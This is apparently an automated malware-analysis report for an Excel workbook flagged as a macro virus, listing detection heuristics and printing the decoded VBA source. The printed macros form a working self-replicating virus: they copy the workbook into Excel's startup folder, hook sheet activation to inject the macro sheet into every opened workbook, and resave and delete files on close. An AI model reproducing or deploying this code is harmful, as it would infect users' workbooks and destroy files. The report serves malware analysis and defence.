MALICIOUS
216
Risk Score
Heuristics 7
-
ClamAV: Doc.Virus.Valyria-10004393-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Virus.Valyria-10004393-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\0_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True) -
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCEThe macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.Matched line in script
If ThisWorkbook.Path <> Application.StartupPath Then -
VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADERThe macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.Matched line in script
Application.OnSheetActivate = "" -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub Auto_Close()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4309 bytes |
SHA-256: 31b941d8124fa42ca6c0ccbb0575ad2454a8d3a87a05060703b72f802b8ba6a4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Kangatang"
Dim jbxXmlOb As Object
Dim jbxXmlNodeOb As Object
Dim jbxB64Array() As Byte
Private jbxstatic_Auto_Open_9306 As Boolean
Private jbxstatic_Auto_Close_6 As Boolean
Private jbxstatic_allocated_9555 As Boolean
Dim jbxinstr As Object
Private Sub JbxInit()
If jbxinstr Is Nothing Then
Randomize
Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\0_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True)
Set jbxXmlOb = CreateObject("MSXML2.DOMDocument")
Set jbxXmlNodeOb = jbxXmlOb.createElement("b64")
End If
End Sub
Private Function JbxB64Encode(ByVal arrData As String) As String
jbxB64Array = StrConv(arrData, vbFromUnicode)
jbxXmlNodeOb.dataType = "bin.base64"
jbxXmlNodeOb.nodeTypedValue = jbxB64Array
JbxB64Encode = Replace(jbxXmlNodeOb.Text, vbLf, "")
End Function
Private Sub JbxClose()
If Not jbxinstr Is Nothing Then
jbxinstr.Close
Set jbxinstr = Nothing
End If
End Sub
Private Sub JbxLogParam(ByVal paramName As String, ByVal param)
Dim jbxErrNum, jbxErrDesc
jbxErrNum = Err.Number
jbxErrDesc = Err.Description
JbxInit
jbxinstr.Write "param:" & paramName & ":type:" & TypeName(param) & ":value:"
On Error Resume Next
If TypeName(param) = "String()" Then
jbxinstr.Write JbxB64Encode(Join(param, " "))
Else
jbxinstr.Write JbxB64Encode(param)
End If
Err.Number = jbxErrNum
Err.Description = jbxErrDesc
jbxinstr.WriteLine ""
End Sub
Private Function JbxLog(ByVal str As String) As Boolean
JbxInit
jbxinstr.WriteLine str
JbxLog = True
End Function
Private Function JbxHook_Replace_3_(jbxline, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
Static jbxtresh_Replace As Integer
If jbxtresh_Replace < 200 Then
JbxLog "api:" & jbxline & ":Replace"
JbxLogParam "jbxparam0", jbxparam0
JbxLogParam "jbxparam1", jbxparam1
JbxLogParam "jbxparam2", jbxparam2
End If
JbxHook_Replace_3_ = Replace(jbxparam0, jbxparam1, jbxparam2)
If jbxtresh_Replace < 200 Then
jbxtresh_Replace = jbxtresh_Replace + 1
JbxLogParam "jbxreturn", JbxHook_Replace_3_
End If
End Function
Sub Auto_Open()
If Not jbxstatic_Auto_Open_9306 Then
jbxstatic_Auto_Open_9306 = JbxLog("function:Auto_Open")
End If
Application.EnableCancelKey = xlDisabled
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
Windows(1).Visible = False
ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
Windows(1).Visible = True
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "mypersonnel.xls!allocated"
JbxClose
End Sub
Sub Auto_Close()
If Not jbxstatic_Auto_Close_6 Then
jbxstatic_Auto_Close_6 = JbxLog("function:Auto_Close")
End If
On Error Resume Next
Application.DisplayAlerts = False
If Right(ThisWorkbook.Name, 4) <> "xlsx" Or Application.Version <= 11 Then
JbxClose
Exit Sub
End If
ThisWorkbook.SaveAs Filename:=ThisWorkbook.Path & "\" & JbxHook_Replace_3_(26, ThisWorkbook.Name, ".xlsx", ".xls"), FileFormat:=xlExcel8, Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
Kill ThisWorkbook.Path & "\" & JbxHook_Replace_3_(29, ThisWorkbook.Name, ".xls", ".xlsx")
JbxClose
End Sub
Sub allocated()
If Not jbxstatic_allocated_9555 Then
jbxstatic_allocated_9555 = JbxLog("function:allocated")
End If
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
Application.ScreenUpdating = False
currentsh = ActiveSheet.Name
ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
ActiveWorkbook.Sheets(currentsh).Select
Application.ScreenUpdating = True
End If
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.